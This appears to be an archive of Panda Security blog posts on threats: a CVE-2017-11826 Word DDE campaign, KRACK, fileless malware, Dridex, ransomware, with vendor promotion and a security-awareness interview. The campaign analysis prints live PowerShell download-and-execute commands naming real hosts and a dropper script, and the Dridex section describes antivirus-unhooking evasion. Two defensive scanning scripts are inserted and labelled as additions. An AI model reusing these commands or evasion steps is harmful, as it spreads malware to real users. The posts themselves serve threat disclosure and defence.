Tag Archives: featured1

A New Attack Takes Advantage of an Exploit in Word

On October 10th, researchers at the Chinese firm Qihoo 360 published an article warning of a zero-day exploit (CVE-2017-11826) affecting Office that was already being actively exploited by attackers.

In the last few hours, we have detected a spam campaign targeting companies and making use of this exploit. This is a very dangerous attack since commands can be executed in Word with no OLE objects or macros needed. All our clients are proactively protected and updating will not be necessary thanks to Adaptive Defense 360.


The email comes with an attached document. When opening the Word document, the first thing we see is the following message:

If we click “Yes”, the following message appears:

Next, the following message appears:

The document (sample 0910541C2AC975A49A28D7A939E48CD3) contains two pages. The first is blank; the second contains just a short message in Russian: “Error! Section unspecified.”

If we right-click the text, we can see that there is an associated field code:

If we click “Edit field”, we find the command used to exploit the vulnerability and allow the code to execute:

DDE C:\Windows\System32\cmd.exe "/k powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('hxxp://arkberg-design.fi/KJHDhbje71');powershell -e $e "
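The field code above is what a defender wants to find without opening the document. The following scanner is an added example, not code from the Panda post: it unpacks a .docx (OOXML, not the binary .doc format the campaign's attachments use) and extracts every DDE/DDEAUTO field instruction from the word/*.xml parts, joining instructions that are split across several instrText runs. The sample document it builds in memory is constructed for the demonstration, and its field code is a harmless placeholder rather than the campaign's command.

```python
"""Added example: extract DDE/DDEAUTO field codes from a .docx (OOXML) file.

Not code from the Panda post. It inspects the XML parts of the package
instead of opening the document, so nothing inside it is executed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{%s}" % W_NS

# A field instruction that starts with DDE or DDEAUTO. Word tolerates leading
# whitespace and a leading quote, so both are allowed before the keyword.
DDE_RE = re.compile(r'^\s*"?\s*DDE(AUTO)?\b', re.IGNORECASE)


def iter_field_codes(root):
    """Yield every field instruction in one WordprocessingML part.

    Word stores fields two ways:
      * <w:fldSimple w:instr="..."/>         (instruction in an attribute)
      * <w:fldChar begin/> <w:instrText>...  (complex field; the instruction
        may be split over several runs, which defeats naive string matching)
    Fragments of a complex field are concatenated before being returned.
    """
    for fld in root.iter(W + "fldSimple"):
        instr = fld.get(W + "instr")
        if instr:
            yield instr
    collecting, fragments = False, []
    for el in root.iter():  # document order, depth first
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                collecting, fragments = True, []
            elif kind in ("separate", "end") and collecting:
                collecting = False
                if fragments:
                    yield "".join(fragments)
        elif el.tag == W + "instrText" and collecting:
            fragments.append(el.text or "")


def scan_docx(data):
    """Return the DDE/DDEAUTO field codes found in any word/*.xml part,
    so headers and footers are covered as well as the document body."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                root = ET.fromstring(zf.read(name))
            except ET.ParseError:
                continue
            hits.extend(c.strip() for c in iter_field_codes(root) if DDE_RE.match(c))
    return hits


def build_sample_docx(instr_fragments, simple_instr="DATE"):
    """Build a minimal .docx in memory (constructed test input, not a real
    sample). The complex-field instruction is written as several
    <w:instrText> runs, the way a crafted document might split it."""
    runs = "".join(
        f'<w:r><w:instrText xml:space="preserve">{escape(f)}</w:instrText></w:r>'
        for f in instr_fragments
    )
    simple = escape(simple_instr, {'"': "&quot;"})
    body = (
        f'<w:p><w:fldSimple w:instr=" {simple} "><w:r><w:t>x</w:t></w:r></w:fldSimple></w:p>'
        f'<w:p><w:r><w:fldChar w:fldCharType="begin"/></w:r>{runs}'
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>Error! Section unspecified.</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r></w:p>'
    )
    document = ('<?xml version="1.0" encoding="UTF-8"?>'
                f'<w:document xmlns:w="{W_NS}"><w:body>{body}</w:body></w:document>')
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-'
        'officedocument.wordprocessingml.document.main+xml"/></Types>')
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/'
        'relationships/officeDocument" Target="word/document.xml"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("_rels/.rels", rels)
        zf.writestr("word/document.xml", document)
    return buf.getvalue()


if __name__ == "__main__":
    # Benign placeholder command, split over three runs on purpose.
    sample = build_sample_docx(["DD", "EAUTO C:\\Windows\\System32\\cmd.exe", ' "/k echo dde-test"'])
    for code in scan_docx(sample):
        print("DDE field found:", code)
```

Pointing scan_docx at a real attachment (open(path, "rb").read()) gives the same report; a non-empty result is the signal to quarantine the file and look at the extracted command, never to open it.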


Here is a screen shot of the process tree that is generated if the exploit is executed properly:

Exploit CVE-2017-11826 – Download and execution of malware from the Word document

Here are some of the files used in this campaign:


Commands to be Executed

Depending on which sample is analyzed, we can see that the download URL changes, while the command stays essentially the same.

Sample 0910541C2AC975A49A28D7A939E48CD3

powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://arkberg-design.fi/KJHDhbje71');powershell -e $e

Sample 19CD38411C58F5441969E039204C3007

powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://ryanbaptistchurch.com/KJHDhbje71');powershell -e $e

Sample 96284109C58728ED0B7E4A1229825448

powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://vithos.de/hjergf76');powershell -e $e

Sample 1CB9A32AF5B30AA26D6198C8B5C46168

powershell -NoP -sta -NonI -w hidden $e=(New-Object System.Net.WebClient).DownloadString('http://alexandradickman.com/KJHDhbje71');powershell -e $e

The following PowerShell script is downloaded and executed (URLs are shown defanged with hxxp, as in the original post; the try/catch braces and the backslash in the temp path, which the post's formatting had dropped, are restored here):

$urls = "hxxp://shamanic-extracts.biz/eurgf837or","hxxp://centralbaptistchurchnj.org/eurgf837or","","hxxp://conxibit.com/eurgf837or"

foreach($url in $urls){
    try {
        # Try each download location in turn, saving the payload under %TEMP%
        Write-Host $url
        $fp = "$env:temp\rekakva32.exe"
        Write-Host $fp
        $wc = New-Object System.Net.WebClient
        $wc.DownloadFile($url, $fp)
        Start-Process $fp
    } catch {
        # A failed download (or the empty entry in the list) just moves on to the next URL
        Write-Host $_.Exception.Message
    }
}

From this URL:


And a Trojan is downloaded (4F03E360BE488A3811D40C113292BC01).

MD5s from the Word document:


The post A New Attack Takes Advantage of an Exploit in Word appeared first on Panda Security Mediacenter.


KRACK attack: beware of public Wi-Fi

Why can KRACK be so dangerous?

Cybersecurity experts have discovered a critical weakness in Wi-Fi connections that could make your private information vulnerable to cyber criminals. The threat is called KRACK (key reinstallation attacks) and could allow someone to steal information sent over your private Wi-Fi or any open connections you might access in public places like coffee shops.

KRACK is dangerous because it affects so many people. Most people who connect wirelessly to the internet through Wi-Fi on their phone, tablet, laptop, etc. do so using the WPA2 (Wi-Fi Protected Access) protocol, which helps keep your information safe by encrypting it—turning it into a secret code. Only now, KRACK has made it much less protected, because thieves may be able to decipher the code that protects your information and read it whenever they want.

Cyber criminals can also use KRACK to modify wirelessly transmitted data to and from the websites you visit. You might think you’re going to your bank’s website, when in reality you’re at a fake phishing site made to look like it. You unknowingly enter your username and password, and the thieves now can record that information.

How do I protect myself?

Update your operating system

Update your OS ASAP. In the meantime, Apple, Google and others are presumably working to roll out a patch to protect against KRACK.

Microsoft just announced it included a patch in an October 10th security update. For Windows customers who have their “Windows Update enabled and applied the security updates,” they’re automatically protected from the KRACK threat, according to Windows Central.

However, don’t assume you’re protected. Even if you’re a Windows user, double check you have the latest security updates.

Use Wi-Fi networks only when necessary

Until you’ve installed the security KRACK patch, avoid using Wi-Fi connections, both at home and especially public hotspots. Your home Wi-Fi connection is slightly more secure only because cyber thieves need to be relatively close to your physical location to steal your data. But that doesn’t mean you’re safe at home or in public.

If you absolutely need to use a wireless network, make sure you’re not transmitting confidential info like your SSN, credit card number, or bank information.

If possible, hardwire your wirelessly connected devices back to your modem/router. Cyber criminals can’t steal signals out of the air if they’re not there, so find that yellow ethernet cable you stashed somewhere in a drawer and use it to connect to as many devices as possible.

Update your wireless router’s firmware

Your router’s firmware helps it work correctly with your devices, so keep it up-to-date. When the security patch rolls out, you don’t want any issues with conflicting or unsupported firmware versions. Updating your router’s firmware is a relatively painless process.

Configure your router so only your approved devices can connect to the network. Each of your devices has a media access control (MAC) address that uniquely identifies it to work with the network. Configure your router to only allow listed devices. The process may differ depending on your router brand.

Hide your Wi-Fi network so even those close enough to detect your signal won’t see it listed. Hiding your network won’t stop dedicated hackers from eventually finding it, but it will create another step they must go through, which is your goal until the patch comes through. It’s likely it will take developers some time to adequately address KRACK, so stay vigilant.

Avoid unencrypted websites

Encrypted websites have HTTPS at the beginning of their URLs. The information you send to and receive from them is secure. Websites that only use HTTP are NOT encrypted. So use HTTPS sites as much as possible. HTTPS Everywhere is a browser plugin that automatically switches thousands of sites from HTTP to HTTPS.

Get some good cybersecurity software

Having cybersecurity software always helps mitigate risk. For critical attacks like KRACK, it’s especially important to add as many layers of protection as possible.

What information can be stolen?

Anything you can send wirelessly over the internet. So, pretty much everything. Passwords, credit card numbers, voice messages, pictures, texts, and the like. Again, this goes for both public and private wireless networks, so your info could be stolen while you’re signed in to the library’s Wi-Fi network or when you’re texting someone from your living room. Deactivate your cell phone’s Wi-Fi connection until you’ve gotten the fix from your OS developer, or stay on the 3G network for data transfer.

Can it affect my devices?

Strictly speaking, no. Neither your wirelessly connected devices nor your router are being directly targeted. Unlike ransomware, thieves aren’t KRACKing into your device and threatening to destroy your information. It’s more of an elaborate heist job than a hostage situation. They want to decrypt the protocol, to eavesdrop on what your devices are saying. They’re interested in the info not who is talking. More importantly, thieves want to go unnoticed.

How did the KRACK vulnerability happen?

Your cell phone and Wi-Fi device (i.e. modem) need to “talk” to each other to decide how to work together and transmit data. The language they use is called a protocol, or system of rules. The protocol is encrypted for privacy. It’s like two people switching to a different language to discuss something privately. If you don’t know the language, you’re in the dark. That’s how your information is kept private when sent over Wi-Fi.

But the KRACK attack gives cyber criminals an opening to decrypt the information sent. It would be like someone bringing an interpreter to the couple’s private discussion. They now can overhear everything that’s being said.

Can I tell if someone’s stealing my info over Wi-Fi?

As of yet, there’s no way to know if someone is KRACKing your wireless access. That’s why it’s especially important to keep an eye out for an update, and to follow the safety recommendations above.



The post KRACK attack: beware of public Wi-Fi appeared first on Panda Security Mediacenter.


Is Fileless Malware an Undetectable Threat?

Unlike the malware that we’re “used to”, fileless malware is able to infect and cause damage without leaving a trace. Its secret, as its name indicates, is not to record any type of file on the hard disk. All action takes place “in the air”, that is, on memory. The moment the system restarts the virus will disappear, but the damage will already be done. Can you fight an enemy that leaves no trace? Of course the answer is yes.

What is Fileless Malware?

Fileless malware is a type of Advanced Volatile Threat or AVT, malicious code that is designed to not write itself onto the hard drive and work from the RAM. In general, viruses and other types of malware need one or more files to act on the system. They are usually detected immediately by defense systems in operation and subsequently identified and quarantined. However, fileless malware does not need such files on the hard drive, so traditional protection systems are in fact completely unable to detect it. Naturally, it is much more difficult to defend against attacks using this technique, as these infections are not only difficult to detect, but also much more resilient and difficult to control.

They are also ephemeral malicious processes, since they disappear the moment the system is reset. Depending on the variants, we can find malware such as Phasebot, a fileless malware sold on the black market as a kit to make a virus specialized in data theft. Or Anthrax, a hybrid virus. Its modus operandi is to go into “fileless mode” once the infected executable has been opened. Once restarted, the virus passes by way of memory and infects new files. Poweliks forces the system to generate fraudulent visits and opens the door to new possibilities of infection through command and control servers (C&C).

The symptoms and damages caused by this fileless malware are very diverse. In any case, it is a serious problem for forensic system analysis, as well as protection strategies based on white lists, signature detection, hardware verification, or pattern recognition … In short, it gives all the tried-and-true methods of malware detection a run for its money.

Protecting Yourself Against Fileless Malware Is Possible

Fileless malware is a concept with a decades-long history behind it. However, its evolution has skyrocketed in recent times, seeing a record of viruses with incredibly harmful potential and overwhelming effectiveness. How can we defend against the threat of a code that leaves no traces on the hard drive? The secret is in behavior. Monitoring the system for malicious behavior is probably the most effective method. Panda Adaptive Defense 360 ​​is able to classify 100% of the active processes in the corporate network and detect any compromising activity, in real time, alerting users of any and all suspicious behavior as soon as it occurs.

In 220 efficacy tests performed with Adaptive Defense 360, 99.4% of the infection attempts were detected. In none of the cases was there a false positive, nor any lost data, including potential fileless viruses in the tests. According to data obtained in the last PandaLabs security report, among our corporate clients 2.67% of the machines protected by traditional solutions suffered attacks by unknown threats, a higher figure when compared to 1.27% of the machines protected with Adaptive Defense, which blocks attacks instantly and without any collateral damage.

A proactive strategy is, as always, the best strategy. The conventional wisdom certainly applies here: always keep your systems updated, monitor suspicious traffic, restrict the use of macros, etc. Other less-known countermeasures include restricting scripting languages and disabling, if possible, Windows PowerShell, one of the main routes exploited by fileless malware. In the end, only dedication and healthy security practices, coupled with the right tools, will keep us safe from the malware that we cannot see.

The post Is Fileless Malware an Undetectable Threat? appeared first on Panda Security Mediacenter.


Don’t Let Yourself Become the Next Equifax

Last month we wrote about the biggest hack of sensitive personal data in history. Equifax, the financial entity that manages data for more than 820 million consumers and more than 91 million businesses around the world, suffered a global attack by an organized group called the PastHole Hacking Team, affecting customer data not only from the United States, but also Canada and the United Kingdom.

Following the recent events, it has come to light that the massive hacking attack is not the only grievance that the company has suffered. As it turns out, there was also malware on the company’s website.

Ars Technica reports that a security analyst named Randy Abrams came to the site to check his credit information when he encountered a fake Adobe Flash installer, one of those pop-ups that abound on the internet and demand that you “click here”, only to redirect you to some malicious site full of internet junk.

The subsequent analysis revealed that the “promoted” malicious software is called Adware.Eorezo and is marked as malware by only three cybersecurity solutions in the world, including Panda Security, testament to the great effort that went into hiding the code so as to cause as much damage as possible.

Panda’s good performance against Adware.Eorezo coincides with the AV-Comparatives Business Security Report recognizing the Adaptive Defense 360 smart cybersecurity solution. This platform would successfully prevent an organization from becoming the victim of an attack such as Equifax. In the words of the independent laboratory, “Panda Adaptive Defense 360 is managed by a well-designed, clearly laid-out cloud-based console, which would be very straightforward for less-experienced administrators to use. This makes it particularly suitable for small businesses, while its EDR features will make it appealing to corporations.”

Now, the question is, how did attackers manage to slip past the security barriers at Equifax, a site with troves of incredibly sensitive data? Things may have turned out differently with the right security solution. Only unlimited visibility and total real-time control of advanced threats can be effective in protecting the IT infrastructure.

The post Don’t Let Yourself Become the Next Equifax appeared first on Panda Security Mediacenter.


Perry Carpenter: “Don’t be Afraid of Simulated Attacks”

Perry Carpenter is Chief Evangelist and Strategy Officer at KnowBe4, one of the most popular platforms for phishing simulations and building cybersecurity awareness. Perry was previously Research Director for Security & Risk Management at Gartner, and is an expert on what can be called the “human side” of cybersecurity. We spoke with Perry about good password hygiene, conditioning ourselves to create good security habits, and the benefits of continual employee training with simulated attacks.

What is your overall vision of the state of enterprise cybersecurity in 2017?

The thing that’s been most encouraging this year when it comes to cybersecurity is seeing some of the teamwork that has happened across the globe. So the threats, I think, will always increase — we’re always going to see new attack vectors, we’re going to see new financially motivated crimes, we’re going to see larger and larger data breaches, like the Equifax breach. I think we’re going to continue to see that, but what’s been encouraging for me is, in the wake of issues like WannaCry and NotPetya, or the GoogleDocs phishing event, we’ve seen a very strong international community of people coming together and sharing real-time research and progress on working through these problems. This seems very new to this year, whereas in past years we’ve seen people hold some of that information close and not share it, because they perhaps wanted to monetize it by building the patches, or selling the fixes to one of the major security vendors, and letting that vendor have an exclusive way for mediating the problem. But we’ve seen a lot of open-source, intelligent sharing between security researchers this year. It’s been great.

Do you believe employees are the weakest link in enterprise cybersecurity?

I believe that users in general can be the weakest link. The thing with users is that we’re all human, and we’re all vulnerable based on the way that our brains are wired. Attackers find ways to manipulate us and get us to perform actions that maybe we believe we’re not susceptible to performing, like clicking on a link or downloading an attachment, or violating a policy. And some of that happens in spite of a person’s better judgement. So we can be the weak links, and it’s because of behavior patterns and neurological factors in how we’re wired. The good news behind that, though, is that, like anything that we learn, and have that learning ingrained in us, good patterns can become habit. That’s the good news for us.

Perry Carpenter

So while a user can be the weak link, we have to realize that they are the last line of defense in many organizations. But if we properly use some behavioral conditioning and some other psychological factors around how we train users, then we can channel them into the right behavior so that they can actually become a very strong part of our layered defense model. After a firewall hasn’t prevented something, or a secure email gateway hasn’t prevented something, or an Endpoint Detection and Response vendor hasn’t protected something, there is that last line of defense that is the human. And we would hope that some of the innate pattern matching abilities that humans have can be strengthened, and some of the muscle memory, and psychological habits that people can get in, can become very strong habits over time.

Do you have any employee protocol that you teach or follow to actually improve how they react to potential threats?

We do, specifically in the social engineering context. We are firm believers, and we are innovators in the market, of automated social engineering testing. And the way that works is, you can configure in the system the types of phishing emails, or voicemail phish, or even multi-pronged phish that span email and text messaging and invoice, all to try to drive somebody to take an unsecure action. By presenting those simulated situations to end users, hopefully without warning, and giving them the opportunity to see those, and giving them the training on how to detect the red flags — when you frequently expose people to that, and you tell them the best practices, and allow them to fail safely the first few times, they’re able to build the more secure reflexes that we would hope that end users have.

The key, for me, is doing that type of testing frequently. And where I see a lot of companies fail is that they will do a simulated social engineering test once a year, or once every three months, and that’s not going to train people. That’s just going to show you how bad the problem is. If you actually want to train people, then it’s like anything else in life. It’s like physical fitness, or a habit that you’re trying to create. You have to engage in that in a very deliberate routine pattern, and in frequent intervals. If you’re testing quarterly, then you’re taking a quarterly baseline. If you’re training every two weeks or every month, then you’re actually starting to develop some muscle memory. If we do that, then we’ll see the behavior improve, we’ll see what we call the person’s “phish-prone percentage” go down. Ultimately the attack surface has been lessened, because the habits are what you want them to be. The only way is to have continual testing, so that they’re continually training that muscle and not letting it atrophy.

How do you overcome cybersecurity fatigue? Even simple security steps, like using strong passwords for example, can frustrate employees. How do you communicate to them the importance of cybersecurity?

There is a behavioral researcher out of Stanford University in the US, BJ Fogg, and I love the way he phrases the behavior problem when it comes to people making healthy choices — and security is pretty much the same way. He says there are three fundamental things about humans. Number one is we’re lazy. Number two is we’re social. And number three is that we’re creatures of habit.

In your example, when it comes to creating a good password, you hit exactly on those three things that he mentions. One, we’re lazy: we want to choose the easy password. Two, we’re social: we’re going to have the same habits as the people around us, so if we’re in a group of people and we’re all complaining, then going with the group mindset is the easiest thing to do. And three, we’re creatures of habit: that definitely plays into password mentality. We’ll choose a password, and then whenever it comes time to create a new password, we’ll just put a number on the end of it. We’ll change it from “monkey1” to “monkey2”, and then “monkey3” and so on. So with passwords we see all three of those principles, and the way to effect change isn’t necessarily just to keep saying security is important. We need to reinforce the “why” behind the policy. The critical thing that we have to do is to facilitate the change we want. So that means pushing them in the right direction in friendly ways, ways that they won’t want to rebel against. You can show them that creating a new password is easy, by even looking at the new NIST password recommendations, where they’re talking about moving to passphrases that are easy to remember, rather than these huge complex passwords that nobody could ever grasp.

What are the key takeaways that an employee should get from cybersecurity training?

I’ll boil it down to the most important one, which is: think before you act. The reason why is because if we just go with our default reflex, that could be wrong. Somebody could be playing us based on emotion or urgency, and we might just react. But if we could slow down for a second and think logically, then we might have the result that the organization wants from a security perspective.

Number two would be to create and remember good passwords, and have good password hygiene. And the reason behind that is that it is one of the things that we can fix now. Even though the password management market has a bad rap, it is better than the system that we use mentally. So a product like LastPass or Dashlane or KeePass can help people have this vault for the 50-60 passwords that they have to remember.

Three would be to care as much about your customer’s data as you care about your personal data.

What advice would you give to a company that wishes to stay safe in the new cyber ecosystem, from both the technological and human side of security?

I would say that safety is relative. We live in the age of having to come to grips with the fact that everybody is compromised, every system is compromised, so when it comes to safety, the key is trying to determine how we handle compromise when we hear of it and what mitigating factors we put in place post-compromise so that the same thing doesn’t happen again. For organizations that are wanting to work on the human behavior side, my best advice is to not be afraid of simulated attacks. That’s the only way to know how your people are going to behave when the real thing comes, and it’s the only way to condition them to have the right behavior. When it comes to safety, we have to take the blinders off, know the situation that we’re in, and act accordingly.

Parts of this interview were lightly edited for clarity.

The post Perry Carpenter: “Don’t be Afraid of Simulated Attacks” appeared first on Panda Security Mediacenter.


Hackers demand nude images instead of money

We thought that we’d seen everything, but hackers managed to hit a new low. Last month the news about a new ransomware that demands nude photos instead of the usual cryptocurrency started circulating the online world. The new ransomware is called nRansomware and works very similarly to Locky – it is a malicious software that infects your device and locks some of the files on your system. Luckily the new threat is not a state-of-the-art malicious software. While Locky encrypts your data, nRansomware is known only to lock your screen. It is unfortunate enough but not absolutely devastating.

Up until now, when a PC was infected with ransomware, the cybercriminals behind it were after immediate monetary gain. However, hackers’ shady techniques are continually evolving. Online troublemakers are starting to realize that Bitcoin and most of the virtual cryptocurrencies are not as secure and untraceable as they initially thought. Payments can easily be tracked, so they decided to get creative by releasing ransomware that demands ten nude photos from the victims to “unlock” their computer.

The new ransomware feels like yet another episode of the modern-day nightmares described in the hit TV series Black Mirror. When infected, your computer displays the text below instead of your desktop. The ruthless message from the hackers is placed on a background containing offensive language and multiple images of Thomas the Tank Engine.

Your computer has been locked. You can only unlock it with the special unlock code. Go to protonmail.com and create an account. Send an email to 1_****_yourself_1@protonmail.com. We will respond immediately. After we reply, you must send at least ten nude pictures of you. After that, we will have the verify that the nudes belong to you. Once you are verified, we will give you your unlock code and sell your nudes on the deep web.

It does sound gross, doesn’t it? The last thing you want is perverts bidding over imagery of your naked body. Hackers have been stealing intimate images from celebrities for a long time. Sadly, now they are starting to realize that they can make a buck by extorting regular people too. You no longer have to be rich or famous to attract hackers’ attention.

Is it a prank or a sign of the new way hackers will be making money out of the innocent? Time will tell. One thing is for sure: cryptocurrencies are not untraceable, and cyber bullies with twisted minds exist out there. They are not afraid to prey on the weak by continuously finding new ways to avoid being caught. The chances of becoming a victim of such ransomware are rare to impossible if you are protected and follow our tips for staying out of trouble.

The post Hackers demand nude images instead of money appeared first on Panda Security Mediacenter.


Cryptocurrency Mining Takes its Toll on AWS Servers

Bitcoin has skyrocketed over the last several years and has become the most coveted currency of today. Not belonging to any state or country, able to be used all over the world equally and immediately, and able to provide complete anonymity when doing business — these are some of its biggest draws. But like any other payment system, using Bitcoin carries with it a few processing costs. Specifically, mining consumes a great deal of energy and requires high-powered hardware. This reality places companies, and their infrastructures, in the crosshairs of cybercriminals looking to make a profit with mining software, without the overhead costs of running servers themselves.

A few days ago, hackers attacked thousands of computers around the world with a ransomware campaign, posing as the Amazon team. Now they’ve turned their attention to the power of the cloud. Companies that use Amazon Web Services (AWS) and do not adequately protect their servers are especially at risk.

Amazon and the Cryptocurrency Business

Despite the many security services that companies can hire for their systems, studies reveal that 97% of the 1,000 largest companies in the world are affected by data breaches and ransomware. Today, thanks to the rise of cryptocurrency, there is a more profitable activity offered by hijacked corporate servers: mining Bitcoins.

The value of this virtual currency has already reached record highs, attracting more and more cybercriminals interested in making easy money. In recent months, threat reports analyzed by PandaLabs show a marked increase in malware installed via the Remote Desktop Protocol (RDP). We witness thousands of ransomware infection attempts every day, as well as attempts to hijack servers for bitcoin mining. These attempts have one thing in common: the access route being the RDP after obtaining credentials through a brute force attack. It’s the same story all over again, just with different characters. We’ve seen it with ransomware and RDP attacks, and now we’re seeing it with bitcoin mining in the business world.

When we think of cryptocurrency, we usually associate it with bitcoin, but there are plenty of others. Hundreds, in fact. Cybercriminals install miners for a whole array of coins, as we saw in a case we wrote about which involved mining software for Monero and took place before the WannaCry attacks.

This time, according to a report by RedLock Cloud Security Intelligence (CSI), Amazon Web Services servers were compromised by cybercriminals who were able to access the system. However, in an unusual development, hackers did not seek to steal data or block the servers, but rather sought to access the system’s power for bitcoin mining. According to the information disclosed by RedLock, Amazon was not the only company attacked, as Aviva and Gemalto, two multinationals, were also mentioned in the report as victims.

What to Do to Protect Your Server

This latest hack shows the importance of creating robust corporate passwords. They don’t even need to be hard to remember. And of course, do not pass up advanced cybersecurity solutions that monitor the organization’s systems in real time, detecting and stopping any suspicious behavior that could be harmful.

The post Cryptocurrency Mining Takes its Toll on AWS Servers appeared first on Panda Security Mediacenter.


Dridex, the Latest Version of the Credential Theft Malware

At the beginning of the year we talked about a new evolution of cyber theft in the banking sector, and today, we are pleased to share a report that has been painstakingly prepared by the malware laboratory at Panda Security on the latest version of Dridex, a famous banking Trojan known for its sophistication and ability to go undetected on infected computers.

What is Dridex?

This report analyses a new variant of the malware known as “Dridex”, specifically its fourth version.

Dridex is a banking Trojan famous for its sophistication and its ability to go undetected on the devices it infects. Once infected, devices are enrolled into a modular botnet, after which additional malicious capabilities, whether third-party or the operators’ own, can be freely added to them via modules or libraries (sold separately).


The first version appeared toward the end of 2014. At the beginning of 2015 an important update was released, giving way to a second version. Of the earlier versions, the most stable and resilient was the third, launched in April 2015 and used in well-known cyberattacks until the fourth version, the latest known version and the subject of this report, was found in February 2017.

No new major updates for Dridex had been found since government agencies dismantled important components of the botnet in 2015.

This new variant of the banking Trojan incorporates new functionalities. One of these is called AtomBombing, a functionality whose aim is to inject code without calling suspicious APIs to avoid being detected by monitoring systems. It incorporates the DLL hijacking technique to achieve persistence. Finally, various cryptographic methods were optimized and used to obtain the configuration.

Characteristics of the Trojan

The following are some static properties of the analysed file.

The hash of the Trojan:

MD5: 001fcf14529ac92a458836f7cec03896
SHA256: a6db7759c737cbf6335b6d77d43110044ec049e8d4cbf7fa9bd4087fa7e415c7


The internal creation date of the analyzed sample is May 16, 2017. The file was compiled to run in 64-bit environments and, at the same time, mimics a legitimate Microsoft DLL.

Figure 1. File properties

Additionally, it is encrypted with a distinctive algorithm to avoid detection by antiviruses.

It has been observed that the executable has a fairly high number of sections, 11 in total, as we can see in Figure 2:

Figure 2. Static information of the analyzed binary

In the DATA section, the entropy is 7.799 and the section is fairly large. This is the section that holds the heavily encrypted and packed binary which, once decrypted, becomes the actual malicious code.
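As an added illustration of the section-entropy check that singles out the DATA section above (example code written for this page, not Panda’s tooling or the report’s own method): a minimal PE section-table parser plus a Shannon entropy calculation, run over a constructed two-section PE-like buffer. The 7.0 cutoff is an assumed triage threshold, and the buffer is a constructed sample, not the Dridex binary.

```python
import hashlib
import math
import struct

ENTROPY_THRESHOLD = 7.0  # assumed triage cutoff (not from the report); encrypted data sits near 8.0

def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of a byte string in bits per byte (0.0 .. 8.0)."""
    n = len(data) or 1  # empty section -> 0.0 rather than a division error
    counts = [data.count(v) for v in range(256)]
    return -sum(c / n * math.log2(c / n) for c in counts if c)

def pe_sections(image: bytes):
    """Yield (name, raw_bytes) per section: MZ -> e_lfanew -> file header -> section table."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    pe_off = struct.unpack_from("<I", image, 0x3C)[0]
    if image[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("not a PE image: missing PE signature")
    num_sections = struct.unpack_from("<H", image, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", image, pe_off + 20)[0]
    table = pe_off + 24 + opt_size  # first 40-byte IMAGE_SECTION_HEADER
    for i in range(num_sections):
        hdr = image[table + 40 * i:table + 40 * (i + 1)]
        name = hdr[:8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", hdr, 16)  # SizeOfRawData, PointerToRawData
        yield name, image[raw_ptr:raw_ptr + raw_size]

def triage(image: bytes):
    """Return (section_count, [(name, raw_size, entropy, suspicious), ...])."""
    rows = []
    for name, raw in pe_sections(image):
        e = shannon_entropy(raw)
        rows.append((name, len(raw), round(e, 3), e >= ENTROPY_THRESHOLD))
    return len(rows), rows

def build_fake_pe() -> bytes:
    """Constructed sample: 64-bit PE-like buffer with a low-entropy .text and a high-entropy DATA."""
    text = b"\x90" * 200 + b"\xc3" * 56  # two byte values only -> entropy well below 1 bit
    data, blk = b"", b"constructed-seed"  # SHA-256 chain stands in for the encrypted payload
    while len(data) < 4096:
        blk = hashlib.sha256(blk).digest()
        data += blk
    headers = 0x40 + 24 + 2 * 40  # DOS header, PE sig + file header, two section headers
    img = bytearray(b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40))  # e_lfanew = 0x40
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 0, 0)  # x64, 2 sections
    for name, raw, ptr in ((b".text", text, headers), (b"DATA", data, headers + len(text))):
        img += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", len(raw), 0x1000, len(raw), ptr, 0, 0, 0, 0, 0)
    return bytes(img) + text + data
```

Running `triage` on a real file (`open(path, "rb").read()`) lists every section with its entropy, so a section count as high as 11 and a near-8.0 data section stand out the same way they do in Figure 2.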

In the first decrypted layer, the executable allocates memory in the process, copies the code into it and finally calls it, as shown in Figure 3:

Figure 3. Jump to shellcode

The first thing the code does is obtain the addresses of the functions it will use later. It does this with a dynamic search through the libraries loaded by the program.

To do so, it walks the PEB_LDR_DATA structure and the LDR_MODULE structures to locate the base address of the loaded DLLs. It then reads the offset of the export table, iterates over all the functions exported by the DLL and finds the address of the sought function in the computer’s memory.

Figure 4. Enumeration of loaded modules

The shellcode then checks whether the undocumented LdrLoadDll function has been hooked, by reading its address and checking whether its first byte is 0xE9, the opcode of a jmp instruction.

Figure 5. Hook Verification

If that check succeeds, it unmaps from the process memory the DLL named “snxhk.dll”, an Avast and AVG library that installs hooks to monitor processes running in the sandbox.

Figure 6. Library: snxhk.dll

